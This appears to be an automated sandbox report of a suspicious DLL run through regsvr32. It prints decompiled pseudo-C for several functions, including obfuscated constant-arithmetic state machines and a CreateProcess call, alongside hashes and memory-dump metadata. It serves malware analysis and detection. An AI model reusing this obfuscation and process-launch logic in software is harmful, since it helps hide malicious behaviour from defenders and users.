0x04f7fd42
0x04f7fd47
0x04f7fd4b
0x04f7fd4f
0x04f7fd57
0x04f7fd5f
0x04f7fd64
0x04f7fced
0x04f7fce2
0x04f7fcd7
0x04f7fccc
0x04f7fcc1
0x04f7fd65
0x04f7fd6e
0x04f7fd6e
0x04f7fed0
0x04f7feda
0x04f7fedf
0x04f7fee7
0x04f7feef
0x04f7fef7
0x04f7fefc
0x04f7ff00
0x04f7ff08
0x04f7ff10
0x04f7ff15
0x04f7ff1d
0x04f7ff25
0x04f7ff33
0x04f7ff36
0x04f7ff3a
0x04f7ff42
0x04f7ff4a
0x04f7ff52
0x04f7ff5a
0x04f7ff77
0x04f7ff7c
0x04f7ff7e
0x04f7ff83
0x04f7ff91
0x04f7ff96
0x04f7ff9b
0x00000000
0x04f7ff85
0x04f7ff85
0x00000000
0x04f7ff85
0x00000000
0x04f7ff9c
0x04f7ff9c
0x00000000
0x04f7ffa7
0x04f7fca6

Strings

], xrefs: 04F7FEC3
n`, xrefs: 04F7FD57
dC, xrefs: 04F7FD96
], xrefs: 04F7FCDD

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: dC$n`$]$]
API String ID: 0-3523242093
Opcode ID: b80e6c4c3b30e7e1e5fe0f1e6ab917008cfad6f02ad275265fc1242926fb4587
Instruction ID: fea1d28e7ebd33adf9d098dee3eb0ce6d54665435b355d9e3e2f2d9582c90b6b
Opcode Fuzzy Hash: b80e6c4c3b30e7e1e5fe0f1e6ab917008cfad6f02ad275265fc1242926fb4587
Instruction Fuzzy Hash: 9B7149716083428FD718CE25E94940BBBE1FBD4718F108C2EF59596260D7B9EA4E8B93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6C26D Relevance: 4.1, Strings: 3, Instructions: 313
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F6C26D(void* __edx) {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				void* _t327;
				void* _t328;
				intOrPtr _t334;
				intOrPtr _t336;
				void* _t342;
				void* _t353;
				intOrPtr _t364;
				signed int _t373;
				signed int _t374;
				signed int _t381;
				signed int _t382;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				intOrPtr _t419;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				void* _t431;
				signed int* _t435;

				_t435 =  &_v1080;
				_v1044 = _v1044 & 0x00000000;
				_v1056 = 0x6c0b2;
				_v1052 = 0x17d8c;
				_v1048 = 0xf66ae;
				_v1080 = 0xcbc9ff;
				_v1080 = _v1080 + 0x2bf5;
				_v1080 = _v1080 * 0x48;
				_t431 = 0x308d9;
				_v1080 = _v1080 ^ 0x395e877f;
				E04F7CB64();
				while(1) {
					L1:
					_t427 = 0x77;
					do {
						while(_t431 != 0x308d9) {
							if(_t431 == 0x80353) {
								_v1068 = 0x91808b;
								_v1068 = _v1068 + 0xffffbca2;
								_v1068 = _v1068 ^ 0x009d41dc;
								_v1072 = 0xc8f00a;
								_t373 = 0x58;
								_v1072 = _v1072 / _t373;
								_v1072 = _v1072 ^ 0x000a1c35;
								_v1080 = 0xd8a08;
								_v1080 = _v1080 >> 0x10;
								_v1080 = _v1080 >> 0xc;
								_t374 = 0xa;
								_v1080 = _v1080 / _t374;
								_v1080 = _v1080 ^ 0x0000fe53;
								_v1076 = 0xf9278a;
								_v1076 = _v1076 * 0x73;
								_v1076 = _v1076 ^ 0x6fee0a1c;
								_t327 = E04F7D6A7(_v1068, _v1072, _v1080, 0x4f6143c, _v1076);
								_v1076 = 0xdb1edf;
								_v1076 = _v1076 + 0x188e;
								_v1076 = _v1076 + 0xffff0a11;
								_v1076 = _v1076 ^ 0x00d77083;
								_t328 = E04F7F3A3();
								_v1068 = 0x24eb11;
								_v1068 = _v1068 >> 7;
								_v1068 = _v1068 << 8;
								_v1068 = _v1068 ^ 0x004f398d;
								_v1080 = 0xdd75a7;
								_t428 = 0x32;
								_v1080 = _v1080 / _t428;
								_v1080 = _v1080 + 0x8925;
								_t429 = 9;
								_v1080 = _v1080 * 0xf;
								_v1080 = _v1080 ^ 0x004e65f3;
								_v1060 = 0x2e5c8b;
								_v1060 = _v1060 | 0x0172ce61;
								_v1060 = _v1060 ^ 0x0175e7c3;
								_v1064 = 0x3b34e6;
								_v1064 = _v1064 << 8;
								_v1064 = _v1064 ^ 0x3b3e6f7c;
								_v1072 = 0x615c94;
								_v1072 = _v1072 | 0x74bfa0ab;
								_v1072 = _v1072 ^ 0xa2592e91;
								_v1072 = _v1072 ^ 0xd6a9f037;
								_v1076 = 0xb8a8c3;
								_v1076 = _v1076 | 0x891ae7c4;
								_v1076 = _v1076 / _t429;
								_v1076 = _v1076 ^ 0x0f4ff96a;
								_t334 =  *0x4f8221c; // 0x33fd420
								_t336 =  *0x4f8221c; // 0x33fd420
								E04F7F342(_v1080, __eflags, _v1060, _t328, _v1064, _t327, _v1072, _t328,  &_v520, _t336 + 0x220, _v1076, _t334 + 4);
								_v1072 = 0x58ed15;
								_v1072 = _v1072 + 0xfffff1e8;
								_v1072 = _v1072 ^ 0x005bc481;
								_v1076 = 0x7a10e3;
								_v1076 = _v1076 * 0x7c;
								_v1076 = _v1076 ^ 0x3b218a6a;
								_v1060 = 0xd207a8;
								_v1060 = _v1060 ^ 0x8062b135;
								_v1060 = _v1060 ^ 0x80bfa32c;
								_v1080 = 0x62f79d;
								_v1080 = _v1080 * 0x45;
								_v1080 = _v1080 >> 0xa;
								_v1080 = _v1080 + 0xffffc73d;
								_v1080 = _v1080 ^ 0x00031616;
								_t342 = E04F6845B(_v1072, _v1076, _v1060, _v1080, _t327);
								_t435 =  &(_t435[0x10]);
								_t431 = 0x86e0d;
								goto L1;
							} else {
								if(_t431 == 0x86e0d) {
									_v1080 = 0x193ca4;
									_v1080 = _v1080 >> 8;
									_v1080 = _v1080 * 0x17;
									_v1080 = _v1080 ^ 0x0009d0e3;
									_v1076 = 0x3903f2;
									_v1076 = _v1076 ^ 0x50c55fe1;
									_v1076 = _v1076 | 0x82116ed4;
									_v1076 = _v1076 ^ 0xd2fc747e;
									_v1060 = 0xa1b814;
									_v1060 = _v1060 + 0xfffffc2f;
									_t314 =  &_v1060;
									 *_t314 = _v1060 ^ 0x00ade04b;
									__eflags =  *_t314;
									_t342 = E04F785A7( &_v520, _v1080,  *_t314,  &_v1040, _v1076, _v1060); // executed
								} else {
									_t443 = _t431 - 0xd7f8e;
									if(_t431 != 0xd7f8e) {
										goto L9;
									} else {
										_v1068 = 0x85771f;
										_v1068 = _v1068 + 0x2bff;
										_t381 = 0x22;
										_v1068 = _v1068 / _t381;
										_t382 = 0x55;
										_v1068 = _v1068 / _t382;
										_v1068 = _v1068 ^ 0x0001779a;
										_v1072 = 0x831a26;
										_v1072 = _v1072 * 0x7b;
										_v1072 = _v1072 * 0x77;
										_v1072 = _v1072 ^ 0x47d4b583;
										_v1064 = 0x5c231b;
										_v1064 = _v1064 + 0xffff2503;
										_v1064 = _v1064 | 0x1bbb2fcc;
										_v1064 = _v1064 / _t427;
										_v1064 = _v1064 ^ 0x0035804a;
										_v1080 = 0x19411e;
										_v1080 = _v1080 + 0x3055;
										_v1080 = _v1080 >> 0xa;
										_v1080 = _v1080 ^ 0x000b73ef;
										_t353 = E04F7D6A7(_v1068, _v1072, _v1064, 0x4f613ec, _v1080);
										_v1080 = 0xded5ef;
										_v1080 = _v1080 ^ 0xe0575623;
										_t61 =  &_v1080; // 0xe0575623
										_t384 = 0x6a;
										_v1080 =  *_t61 / _t384;
										_t67 =  &_v1080; // 0xe0575623
										_t385 = 0x1c;
										_v1080 =  *_t67 / _t385;
										_v1080 = _v1080 ^ 0x0011505e;
										_v1072 = 0x9ec033;
										_v1072 = _v1072 + 0xffff6e3a;
										_v1072 = _v1072 >> 8;
										_v1072 = _v1072 ^ 0x125779e3;
										_v1072 = _v1072 ^ 0x125d1c3c;
										_v1064 = 0x32ff82;
										_t386 = 6;
										_v1064 = _v1064 / _t386;
										_v1064 = _v1064 << 0xa;
										_v1064 = _v1064 * 0x1b;
										_v1064 = _v1064 ^ 0x95f24ffa;
										_v1068 = 0xd12c2;
										_v1068 = _v1068 + 0xffff3a84;
										_v1068 = _v1068 / _t427;
										_v1068 = _v1068 << 2;
										_v1068 = _v1068 ^ 0x000e26cb;
										_v1076 = 0xed2855;
										_v1076 = _v1076 + 0xffff3ab7;
										_v1076 = _v1076 + 0xffff3810;
										_v1076 = _v1076 ^ 0x00eb82a0;
										_t364 =  *0x4f8221c; // 0x33fd420
										_t419 =  *0x4f8221c; // 0x33fd420
										E04F736BB(_t419 + 4, _t443, _t386, _v1072, _t364 + 0x220, _v1064, _v1068, _t353, _v1076,  &_v1040);
										_v1072 = 0x1194a6;
										_v1072 = _v1072 ^ 0xb8f4bc54;
										_v1072 = _v1072 << 0xb;
										_v1072 = _v1072 >> 4;
										_v1072 = _v1072 ^ 0x029ee8e5;
										_v1068 = 0xabe1ce;
										_v1068 = _v1068 + 0x1ff3;
										_t388 = 6;
										_v1068 = _v1068 * 0x5f;
										_v1068 = _v1068 ^ 0x3fd38e6b;
										_v1080 = 0x9136e9;
										_v1080 = _v1080 + 0xffff6c86;
										_v1080 = _v1080 + 0x1f5;
										_t389 = 0x4c;
										_v1080 = _v1080 / _t388;
										_v1080 = _v1080 ^ 0x001a5f7f;
										_v1076 = 0x5da5ae;
										_v1076 = _v1076 ^ 0xb1bd91ef;
										_v1076 = _v1076 / _t389;
										_v1076 = _v1076 ^ 0x0256d21d;
										_t342 = E04F6845B(_v1072, _v1068, _v1080, _v1076, _t353);
										_t435 =  &(_t435[0xe]);
										_t431 = 0x80353;
										continue;
									}
								}
							}
							L12:
							return _t342;
						}
						_t431 = 0xd7f8e;
						L9:
						__eflags = _t431 - 0xc4c3c;
					} while (_t431 != 0xc4c3c);
					goto L12;
				}
			}

0x04f6c26d
0x04f6c273
0x04f6c278
0x04f6c280
0x04f6c288
0x04f6c290
0x04f6c297
0x04f6c2aa
0x04f6c2ae
0x04f6c2b0
0x04f6c2bd
0x04f6c2c7
0x04f6c2c7
0x04f6c2c9
0x04f6c2ca
0x04f6c2ca
0x04f6c2d8
0x04f6c573
0x04f6c57d
0x04f6c585
0x04f6c58d
0x04f6c59b
0x04f6c5a0
0x04f6c5a6
0x04f6c5ae
0x04f6c5b6
0x04f6c5bb
0x04f6c5c4
0x04f6c5c7
0x04f6c5cb
0x04f6c5d3
0x04f6c5e0
0x04f6c5e4
0x04f6c601
0x04f6c606
0x04f6c611
0x04f6c61b
0x04f6c623
0x04f6c62f
0x04f6c634
0x04f6c63e
0x04f6c645
0x04f6c64a
0x04f6c652
0x04f6c660
0x04f6c665
0x04f6c66b
0x04f6c678
0x04f6c679
0x04f6c67d
0x04f6c685
0x04f6c68d
0x04f6c695
0x04f6c69d
0x04f6c6a5
0x04f6c6aa
0x04f6c6b2
0x04f6c6ba
0x04f6c6c2
0x04f6c6ca
0x04f6c6d2
0x04f6c6da
0x04f6c6e8
0x04f6c6ec
0x04f6c6f4
0x04f6c701
0x04f6c72b
0x04f6c730
0x04f6c738
0x04f6c740
0x04f6c748
0x04f6c756
0x04f6c75a
0x04f6c762
0x04f6c76a
0x04f6c772
0x04f6c77a
0x04f6c787
0x04f6c78b
0x04f6c790
0x04f6c798
0x04f6c7b0
0x04f6c7b5
0x04f6c7b8
0x00000000
0x04f6c2de
0x04f6c2e4
0x04f6c7d2
0x04f6c7e1
0x04f6c7eb
0x04f6c7f3
0x04f6c7fb
0x04f6c803
0x04f6c80b
0x04f6c813
0x04f6c81b
0x04f6c823
0x04f6c82b
0x04f6c82b
0x04f6c82b
0x04f6c840
0x04f6c2ea
0x04f6c2ea
0x04f6c2ec
0x00000000
0x04f6c2f2
0x04f6c2f2
0x04f6c2fc
0x04f6c30a
0x04f6c30f
0x04f6c319
0x04f6c31e
0x04f6c322
0x04f6c32a
0x04f6c337
0x04f6c340
0x04f6c344
0x04f6c34c
0x04f6c354
0x04f6c35c
0x04f6c36a
0x04f6c36e
0x04f6c376
0x04f6c37e
0x04f6c386
0x04f6c38b
0x04f6c3a8
0x04f6c3ad
0x04f6c3b8
0x04f6c3c2
0x04f6c3ca
0x04f6c3cf
0x04f6c3d3
0x04f6c3d9
0x04f6c3de
0x04f6c3e2
0x04f6c3ea
0x04f6c3f2
0x04f6c3fa
0x04f6c3ff
0x04f6c407
0x04f6c40f
0x04f6c41d
0x04f6c422
0x04f6c426
0x04f6c430
0x04f6c434
0x04f6c43c
0x04f6c444
0x04f6c452
0x04f6c456
0x04f6c45b
0x04f6c463
0x04f6c46b
0x04f6c477
0x04f6c47f
0x04f6c495
0x04f6c4a4
0x04f6c4b2
0x04f6c4b7
0x04f6c4c1
0x04f6c4c9
0x04f6c4ce
0x04f6c4d3
0x04f6c4db
0x04f6c4e3
0x04f6c4f2
0x04f6c4f5
0x04f6c4f9
0x04f6c501
0x04f6c509
0x04f6c511
0x04f6c51f
0x04f6c520
0x04f6c526
0x04f6c52e
0x04f6c536
0x04f6c545
0x04f6c549
0x04f6c561
0x04f6c566
0x04f6c569
0x00000000
0x04f6c569
0x04f6c2ec
0x04f6c2e4
0x04f6c848
0x04f6c852
0x04f6c852
0x04f6c7c2
0x04f6c7c4
0x04f6c7c4
0x04f6c7c4
0x00000000
0x04f6c7d0

Strings

U(, xrefs: 04F6C463
#VW, xrefs: 04F6C3C2
|o>;, xrefs: 04F6C6AA

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #VW$U($|o>;
API String ID: 0-3585815096
Opcode ID: aba26e4244eb86262d297410628baca8051eba29009fd812b292fa69afee51c9
Instruction ID: eaf5c6a2631d2fad62617905b05603528ccc11770c5122cd0443ab69b6ee6094
Opcode Fuzzy Hash: aba26e4244eb86262d297410628baca8051eba29009fd812b292fa69afee51c9
Instruction Fuzzy Hash: 3EE121725093429FC348CF25D98980BBBE1FBC4758F008A1DF1D59A260D3B59A4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F73B17 Relevance: 2.7, Strings: 2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E04F73B17(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				char _v64;
				char _v132;
				void* _t199;
				void* _t216;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				intOrPtr _t245;
				void* _t246;

				_push(_a32);
				_t245 = _a28;
				_t246 = __edx;
				_push(_t245);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t199);
				_v48 = 0x83f2f;
				_v44 = 0x9a94d;
				_v20 = 0x6369b5;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 ^ 0x0000c656;
				_v12 = 0xf3e125;
				_t225 = 0x38;
				_v12 = _v12 * 0x18;
				_v12 = _v12 | 0x3df5afa2;
				_v12 = _v12 ^ 0x3ff99882;
				_v8 = 0xa30953;
				_v8 = _v8 + 0x3230;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0x00029a29;
				_v16 = 0x6f17a0;
				_v16 = _v16 + 0x7c32;
				_v16 = _v16 / _t225;
				_v16 = _v16 ^ 0x000a6078;
				E04F6E8B9(_v20, _v12, 0x44, _v8, _v16,  &_v132);
				_v132 = 0x44;
				_v16 = 0xa8ae63;
				_v16 = _v16 + 0xffff2c44;
				_v16 = _v16 + 0x9be9;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0x50e8aa07;
				_v44 = 0xba6b05;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x000a7bc3;
				_v36 = 0x9d7b5e;
				_t227 = 0x7c;
				_v36 = _v36 * 0x65;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00337801;
				_v32 = 0x9ebb80;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x39942b40;
				_v32 = _v32 ^ 0x39bf1490;
				_v12 = 0x305002;
				_v12 = _v12 / _t227;
				_v12 = _v12 ^ 0x7aec9718;
				_v12 = _v12 | 0x9d20134a;
				_v12 = _v12 ^ 0xffeb895a;
				_v28 = 0xaa1d7b;
				_t228 = 0x77;
				_v28 = _v28 / _t228;
				_v28 = _v28 + 0xffff0944;
				_v28 = _v28 ^ 0x0007e1dd;
				_v24 = 0xcb718e;
				_v24 = _v24 | 0xc4200191;
				_v24 = _v24 ^ 0xb7372624;
				_v24 = _v24 ^ 0x73d0aad8;
				_v40 = 0xe71845;
				_v40 = _v40 | 0x9dbc18da;
				_v40 = _v40 ^ 0x9dfde837;
				_v20 = 0x9367b2;
				_v20 = _v20 ^ 0x53a1a893;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xb3c9fb8b;
				_t229 = 0x36;
				_v8 = 0xfb1f86;
				_v8 = _v8 / _t229;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0xffff9221;
				_v8 = _v8 ^ 0x025f4d8d;
				_t216 = E04F63CF2(_t229, _v16, _v44, _v36, _t246, _v32, _v12, _t229, _v28, _t229,  &_v132, _v24, _v40, _a16, _v20,  &_v64, _t229, _t229, _a24, _v8); // executed
				if(_t216 == 0) {
					return 0;
				}
				if(_t245 == 0) {
					_v16 = 0x6e753e;
					_v16 = _v16 ^ 0xdc47eb34;
					_v16 = _v16 | 0xa79ff2e3;
					_v16 = _v16 ^ 0xffbfe01d;
					_v32 = 0xdb1e0c;
					_v32 = _v32 + 0xffffff67;
					_v32 = _v32 | 0xc6d0e365;
					_v32 = _v32 ^ 0xc6d960fe;
					_v36 = 0x5e994;
					_v36 = _v36 + 0xffff189f;
					_v36 = _v36 ^ 0x0bbe1598;
					_v36 = _v36 ^ 0x0bb60c02;
					E04F68B6C(_v16, _v64, _v32, _v36);
					_v36 = 0xf1c789;
					_v36 = _v36 ^ 0xed4cfc93;
					_v36 = _v36 | 0xd72f5ca1;
					_v36 = _v36 ^ 0xffb58bd0;
					_v16 = 0xdcbbaf;
					_v16 = _v16 * 0x18;
					_v16 = _v16 >> 0xe;
					_v16 = _v16 * 0x2d;
					_v16 = _v16 ^ 0x0000af59;
					_v44 = 0x687e30;
					_v44 = _v44 + 0xffffdca6;
					_v44 = _v44 ^ 0x006a9242;
					E04F68B6C(_v36, _v60, _v16, _v44);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x04f73b22
0x04f73b25
0x04f73b28
0x04f73b2a
0x04f73b2b
0x04f73b2e
0x04f73b31
0x04f73b34
0x04f73b37
0x04f73b39
0x04f73b3c
0x04f73b3d
0x04f73b3e
0x04f73b43
0x04f73b4c
0x04f73b53
0x04f73b5a
0x04f73b5e
0x04f73b62
0x04f73b69
0x04f73b76
0x04f73b77
0x04f73b7a
0x04f73b81
0x04f73b88
0x04f73b8f
0x04f73b96
0x04f73b9e
0x04f73ba1
0x04f73ba8
0x04f73baf
0x04f73bbb
0x04f73bc1
0x04f73bd7
0x04f73bdc
0x04f73be6
0x04f73bef
0x04f73bf6
0x04f73bfd
0x04f73c01
0x04f73c08
0x04f73c0f
0x04f73c13
0x04f73c1a
0x04f73c27
0x04f73c28
0x04f73c2b
0x04f73c2f
0x04f73c36
0x04f73c3d
0x04f73c41
0x04f73c48
0x04f73c4f
0x04f73c5b
0x04f73c5e
0x04f73c65
0x04f73c6c
0x04f73c75
0x04f73c81
0x04f73c86
0x04f73c8b
0x04f73c92
0x04f73c99
0x04f73ca0
0x04f73ca7
0x04f73cae
0x04f73cb5
0x04f73cbc
0x04f73cc3
0x04f73cca
0x04f73cd1
0x04f73cd8
0x04f73cdc
0x04f73ce3
0x04f73ce4
0x04f73cf0
0x04f73cf6
0x04f73cfa
0x04f73d01
0x04f73d36
0x04f73d40
0x00000000
0x04f73e28
0x04f73d48
0x04f73d59
0x04f73d60
0x04f73d67
0x04f73d6e
0x04f73d75
0x04f73d7c
0x04f73d83
0x04f73d8a
0x04f73d91
0x04f73d98
0x04f73d9f
0x04f73da6
0x04f73db9
0x04f73dbe
0x04f73dc5
0x04f73dcc
0x04f73dd3
0x04f73dda
0x04f73de5
0x04f73de8
0x04f73df0
0x04f73df3
0x04f73dfa
0x04f73e01
0x04f73e08
0x04f73e1b
0x04f73d4a
0x04f73d4d
0x04f73d4e
0x04f73d4f
0x04f73d50
0x04f73d50
0x00000000

Strings

0~h, xrefs: 04F73DFA
>un, xrefs: 04F73D59

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 0~h$>un
API String ID: 963392458-1417812750
Opcode ID: 6baa7db634987c601068a65c9708cbdf2214c96ea372abdbbf8aa4f28e49e786
Instruction ID: 1d73d17bcc87e57d68795487d09d579dcf384a8606e474d63d29b6a68e81a8f5
Opcode Fuzzy Hash: 6baa7db634987c601068a65c9708cbdf2214c96ea372abdbbf8aa4f28e49e786
Instruction Fuzzy Hash: 7791F171C00209EBDF49CFE5D94A8EEBFB1FB48314F208189E525B6260D3B95A15DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04F7E4B2 Relevance: 2.6, Strings: 2, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E04F7E4B2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t73;
				void* _t79;
				void* _t82;
				signed int _t92;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t73);
				_v16 = _v16 & 0x00000000;
				_v20 = 0x3a7a;
				_v12 = 0xf9f0f2;
				_t92 = 0x5a;
				_v12 = _v12 / _t92;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x00038cc1;
				_v8 = 0xb113be;
				_v8 = _v8 >> 1;
				_v8 = _v8 + 0x777e;
				_v8 = _v8 ^ 0x0054093e;
				_t79 = E04F6D551(__ecx);
				_v8 = 0x6574e1;
				_v8 = _v8 ^ 0x4ef87997;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 * 0x4a;
				_v8 = _v8 ^ 0x002197dc;
				_v8 = 0xc1d06b;
				_v8 = _v8 + 0x8c58;
				_v8 = _v8 | 0xeecfce9f;
				_v8 = _v8 ^ 0xeec92c40;
				_v12 = 0x1c1361;
				_v12 = _v12 ^ 0x4e7cc64d;
				_v12 = _v12 ^ 0x4e66f32f;
				_v12 = 0x349264;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x034015f6;
				_v8 = 0x1ad051;
				_v8 = _v8 / _t92;
				_v8 = _v8 ^ 0xa24a6e76;
				_v8 = _v8 + 0xffff2632;
				_v8 = _v8 ^ 0xa2440195;
				_v12 = 0x5e52ec;
				_v12 = _v12 + 0xffffe4bb;
				_v12 = _v12 ^ 0x005d9d7e;
				_t82 = E04F789C9(_v8, _a8, _t79, _v8 * 0x4a, _v12); // executed
				return _t82;
			}

0x04f7e4ba
0x04f7e4bd
0x04f7e4c0
0x04f7e4c1
0x04f7e4c2
0x04f7e4c7
0x04f7e4ce
0x04f7e4d7
0x04f7e4e3
0x04f7e4e6
0x04f7e4e9
0x04f7e4ed
0x04f7e4f4
0x04f7e4fb
0x04f7e4fe
0x04f7e505
0x04f7e512
0x04f7e517
0x04f7e520
0x04f7e529
0x04f7e531
0x04f7e534
0x04f7e53b
0x04f7e542
0x04f7e549
0x04f7e550
0x04f7e557
0x04f7e55e
0x04f7e565
0x04f7e56c
0x04f7e573
0x04f7e577
0x04f7e57e
0x04f7e58d
0x04f7e590
0x04f7e597
0x04f7e59e
0x04f7e5a5
0x04f7e5ac
0x04f7e5b3
0x04f7e5c2
0x04f7e5cf

Strings

te, xrefs: 04F7E517
R^, xrefs: 04F7E5A5

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: R^$te
API String ID: 3298025750-3050338854
Opcode ID: 7b2afbfa54a244680a3e22c7c423506f26c1ba81cc6a6b3f15150f5486bd6417
Instruction ID: b29eff1200c618f37686106ea09d2414aeb26622975516b6a0eb5d3a76b27ccc
Opcode Fuzzy Hash: 7b2afbfa54a244680a3e22c7c423506f26c1ba81cc6a6b3f15150f5486bd6417
Instruction Fuzzy Hash: 4D31E175D01608FBDB08DFA5C6494CEBFB5BB50318F20C099D516AB260D3B45B85EB40

Uniqueness

Uniqueness Score: -1.00%

Function 10018246 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10018246() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E100181F8); // executed
				 *0x1003a4b4 = _t1;
				return 0;
			}

0x1001824b
0x10018251
0x10018258

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_000181F8), ref: 1001824B

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6ae9eadfa0a59b8e9e2620c716c6d0374d3f60cab3f6abc59e5b1e18cf53e332
Instruction ID: 19e5ef85f1c6b074eae053feec9fb52172a3ab49bbaf290e75bd22f8268f9ec3
Opcode Fuzzy Hash: 6ae9eadfa0a59b8e9e2620c716c6d0374d3f60cab3f6abc59e5b1e18cf53e332
Instruction Fuzzy Hash: 4CA022B28020308FE300CF308E8C0003AE8E3C83023000020EF82CE222EB38C2C28F20

Uniqueness

Uniqueness Score: -1.00%

Function 1001825A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 1001825F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8f553ca4d4bd98a52824076b3bd28ec37de5aeec962c6df0d5e0166ed401f7b3
Instruction ID: c091c4e1bf8fdb422519c3348aab80903a4b0aab302cbe51154732e15666b91e
Opcode Fuzzy Hash: 8f553ca4d4bd98a52824076b3bd28ec37de5aeec962c6df0d5e0166ed401f7b3
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 04F785A7 Relevance: 1.5, Strings: 1, Instructions: 204
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

